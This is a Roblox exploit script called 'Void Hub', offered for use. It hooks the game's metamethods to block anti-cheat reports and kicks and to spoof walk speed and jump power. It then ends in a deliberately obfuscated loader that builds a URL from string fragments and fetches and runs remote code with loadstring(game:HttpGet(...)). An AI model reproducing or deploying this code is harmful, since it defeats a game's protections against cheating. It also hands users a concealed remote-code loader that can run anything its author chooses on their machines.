-- Hah! I see you peeking at this piece of code, why you tryna skid? Good luck deobfuscating.
-- Credits to qxkya and decode <3

wait(1)
game.StarterGui:SetCore("SendNotification", {
        Title = "Void Hub";
        Text = "Status: Waiting for game";
        Duration = 1;
})

repeat
    wait()
until game:IsLoaded()

wait(1)
game.StarterGui:SetCore("SendNotification", {
        Title = "Void Hub";
        Text = "Status: Returning arguments";
        Duration = 1;
})

local gm = getrawmetatable(game)
setreadonly(gm, false)
local namecall = gm.__namecall
gm.__namecall =
    newcclosure(
    function(self, ...)
        local args = {...}
        if not checkcaller() and getnamecallmethod() == "FireServer" and tostring(self) == "MainEvent" then
            if tostring(getcallingscript()) ~= "Framework" then
                return
            end
        end
        if not checkcaller() and getnamecallmethod() == "Kick" then
            return
        end
        return namecall(self, unpack(args))
    end)

wait(1)
game.StarterGui:SetCore("SendNotification", {
        Title = "Void Hub";
        Text = "Status: Fetching data from server";
        Duration = 1;
})

wait(1)
game.StarterGui:SetCore("SendNotification", {
        Title = "Void Hub";
        Text = "Status: Ready to launch";
        Duration = 1;
})

wait(1)
game.StarterGui:SetCore("SendNotification", {
        Title = "Void Hub";
        Text = "Status: Launching";
        Duration = 1;
})

local ReplicatedStorage = game:GetService("ReplicatedStorage")

local tablefind = table.find
local MainEvent = ReplicatedStorage.MainEvent
local SpoofTable = {
    WalkSpeed = 16,
    JumpPower = 50
}

local Flags = {
    "CHECKER_1",
    "TeleportDetect",
    "OneMoreTime"
}

local __namecall
__namecall = hookmetamethod(game, "__namecall", function(...)
    local args = {...}
    local self = args[1]
    local method = getnamecallmethod()
    local caller = getcallingscript()

    if (method == "FireServer" and self == MainEvent and tablefind(Flags, args[2])) then
        return
    end

    if (not checkcaller() and getfenv(2).crash) then
        hookfunction(getfenv(2).crash, function()
            warn("Crash Attempt") 
        end)
    end
    
    return __namecall(...)
end)

local __index
__index = hookmetamethod(game, "__index", function(t, k)
    if (not checkcaller() and t:IsA("Humanoid") and (k == "WalkSpeed" or k == "JumpPower")) then
        return SpoofTable[k]
    end

    return __index(t, k)
end)



([[
                This script has been licensed using Luauth
            Unauthorized distribution of this script is forbidden.
      Any attempts at tampering, reverse engineering or modifying this script's 
      internal logic will result in a global ban, and make you blacklisted from
            every single script that has been licensed with Luauth

            Luauth v1.0a, #1 lua whitelisting system by Federal#9999

                                
     \ \   / /__ () | | | | | |   | |
      \ \ / /  | |/ ` | | || | | | | ' \ 
       \ V / () | | (| | |    | || | |) |
        _/ ___/||_,| || ||_,|_./ 



                 Script ID: f3da-64c0195e-45c2a48b-22f8
]])




{(function(b)local c=debug.getmetatable(b)debug.setmetatable(b,{call=function(d,e)debug.setmetatable(b,c)return function(b)b{"f3da-64c0195e-45c2a48b-22f8",d}end end})end)""}(function(b)local b=b[1]local c=""local d=24915;local e=0;local f={}while e<966 do e=e+1;while e<605 and d%5260<2630 do e=e+1;d=(d-466)%41090;local b=e+d;if(d%3504)>1752 then d=(d-706)%30483;while e<313 and d%7102<3551 do e=e+1;d=(d411)%43087;local b=e+d;if(d%14970)>7485 then d=(d355)%41240;local b=76830;if not f[b]then f[b]=1;c=c..'.x'end elseif d%2~=0 then d=(d316)%34377;local b=51374;if not f[b]then f[b]=1;c=c..'luauth'end else d=(d939)%2412;e=e+1;local b=67052;if not f[b]then f[b]=1 end end end elseif d%2~=0 then d=(d+986)%9320;while e<597 and d%3566<1783 do e=e+1;d=(d-950)%7147;local b=e+d;if(d%4020)<2010 then d=(d+826)%6247;local b=79206;if not f[b]then f[b]=1;c=c..'ht'end elseif d%2~=0 then d=(d+737)%14175;local b=51471;if not f[b]then f[b]=1;c=c..'tp'end else d=(d705)%44808;e=e+1;local b=58695;if not f[b]then f[b]=1;c=c..'s:'end end end else d=(d80)%11734;e=e+1;while e<951 and d%19762<9881 do e=e+1;d=(d899)%25086;local b=e+d;if(d%11548)>5774 then d=(d412)%37881;local b=84492;if not f[b]then f[b]=1;c=c..'//'end elseif d%2~=0 then d=(d-419)%22808;local b=94003;if not f[b]then f[b]=1;c=c..'ap'end else d=(d-851)%30011;e=e+1;local b=21386;if not f[b]then f[b]=1;c=c..'i.'end end end end end;d=(d+751)%33125 end(function(d)local e=d;local f=0;local g=0;e={(function(b)if f>34 then return b end;f=f+1;g=(g+3253-b)%79;return(g%3==1 and(function(b)if not d[b]then g=g+1;d[b]=(26)c=c..'il'end;return true end)'igRzv'and e[2](687+b))or(g%3==0 and(function(b)if not d[b]then g=g+1;d[b]=(103)c=c..'.l'end;return true end)'TilxU'and e[3](b+101))or(g%3==2 and(function(b)if not d[b]then g=g+1;d[b]=(227)end;return true end)'QwIsb'and e[1](b+320))or b end),(function(b)if f>32 then return b end;f=f+1;g=(g+1509-b)%57;return(g%3==0 and(function(b)if not d[b]then g=g+1;d[b]=(139)c=c..'yz'end;return true end)'aOitw'and e[3](909+b))or(g%3==1 and(function(b)if not d[b]then g=g+1;d[b]=(65)end;return true end)'ObBbT'and e[1](b+129))or(g%3==2 and(function(b)if not d[b]then g=g+1;d[b]=(153)c=c..'ua'end;return true end)'uXJZp'and e[2](b+567))or b end),(function(h)if f>35 then return h end;f=f+1;g=(g+1756-h)%21;return(g%3==2 and(function(b)if not d[b]then g=g+1;d[b]=(2)c=c..'/f'end;return true end)'bdEJm'and e[1](782+h))or(g%3==0 and(function(b)if not d[b]then g=g+1;d[b]=(108)c=c..'es'end;return true end)'JDvcj'and e[3](h+117))or(g%3==1 and(function(e)if not d[e]then g=g+1;d[e]=(10)c=c..'/l/'..b end;return true end)'tIFsS'and e[2](h+748))or h end)}e[2](8832)end){}loadstring(game:HttpGet(c))()end)
